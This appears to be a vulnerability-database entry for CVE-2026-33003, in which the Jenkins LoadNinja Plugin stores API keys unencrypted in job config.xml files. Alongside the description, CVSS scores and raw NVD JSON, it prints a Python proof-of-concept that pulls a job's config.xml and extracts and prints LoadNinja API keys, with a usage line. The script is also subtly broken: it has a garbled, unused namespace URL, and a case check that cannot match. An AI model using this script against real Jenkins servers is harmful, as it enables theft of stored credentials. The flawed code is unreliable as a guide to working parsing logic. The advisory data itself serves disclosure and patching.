CVE-2026-33003

Description

Jenkins LoadNinja Plugin 2.1 and earlier stores LoadNinja API keys unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:jenkins:loadninja:*:*:*:*:*:jenkins:*:* - VULNERABLE

Jenkins LoadNinja Plugin <= 2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-33003 PoC - Jenkins LoadNinja Plugin API Key Disclosure
# Target: Jenkins instance with LoadNinja Plugin <= 2.1
# Requirement: Item/Extended Read permission on the job

import requests
from xml.etree import ElementTree as ET
import argparse

def extract_api_key(jenkins_url, job_name, auth_token=None):
    """
    Extract LoadNinja API key from Jenkins job config.xml
    """
    config_url = f"{jenkins_url}/job/{job_name}/config.xml"
    headers = {'Accept': 'application/xml'}
    
    # Make request to get config.xml
    if auth_token:
        response = requests.get(config_url, headers=headers, auth=auth_token)
    else:
        response = requests.get(config_url, headers=headers)
    
    if response.status_code == 200:
        # Parse XML to find LoadNinja API key
        root = ET.fromstring(response.content)
        
        # Common namespace patterns for Jenkins plugins
        namespaces = {
            'jenkins': 'http://hudson Hudson.org/PLUGIN/1.0',
            '': ''
        }
        
        # Search for loadninja related elements
        for elem in root.iter():
            if 'loadninja' in elem.tag.lower() or 'apiKey' in elem.tag.lower():
                print(f"Found: {elem.tag} = {elem.text}")
        
        # Alternative: Direct string search
        content = response.text.lower()
        if 'loadninja' in content and 'apikey' in content:
            print("\n[!] LoadNinja API key may be present in configuration")
            # Extract the API key value
            import re
            api_key_pattern = r'<loadninjaApiKey>([^<]+)</loadninjaApiKey>'
            matches = re.findall(api_key_pattern, response.text)
            for key in matches:
                print(f"[+] API Key Found: {key}")
                return key
    else:
        print(f"[-] Failed to access config.xml: HTTP {response.status_code}")
    return None

def main():
    parser = argparse.ArgumentParser(description='CVE-2026-33003 PoC')
    parser.add_argument('--url', required=True, help='Jenkins URL')
    parser.add_argument('--job', required=True, help='Job name with LoadNinja plugin')
    parser.add_argument('--user', help='Username for auth')
    parser.add_argument('--pass', dest='password', help='Password or API token')
    args = parser.parse_args()
    
    auth = None
    if args.user and args.password:
        auth = (args.user, args.password)
    
    print(f"[*] Extracting LoadNinja API key from {args.url}/job/{args.job}/")
    api_key = extract_api_key(args.url, args.job, auth)
    
    if api_key:
        print(f"\n[+] Successfully extracted API key: {api_key}")
        print("[*] This key can be used to access LoadNinja API")
    else:
        print("[-] No API key found or access denied")

if __name__ == '__main__':
    main()

# Usage:
# python cve-2026-33003-poc.py --url http://jenkins.example.com --job my-load-test --user admin --pass API_TOKEN

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33003
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33003
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33003/
[4] VulDB https://vuldb.com/cve/CVE-2026-33003
[5] https://www.jenkins.io/security/advisory/2026-03-18/#SECURITY-3642

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33003", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:28.290", "lastModified": "2026-03-21T00:18:27.543", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins LoadNinja Plugin 2.1 and earlier stores LoadNinja API keys unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system."}, {"lang": "es", "value": "El plugin de LoadNinja para Jenkins 2.1 y versiones anteriores almacena claves de API de LoadNinja sin cifrar en archivos config.xml de trabajos en el controlador de Jenkins, donde pueden ser vistas por usuarios con permiso de Lectura Extendida de Ítem o acceso al sistema de archivos del controlador de Jenkins."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:loadninja:*:*:*:*:*:jenkins:*:*", "versionEndExcluding": "2.2", "matchCriteriaId": "9BCE27DC-E2B1-4969-AE65-2E2CEA7C0514"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2026-03-18/#SECURITY-3642", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}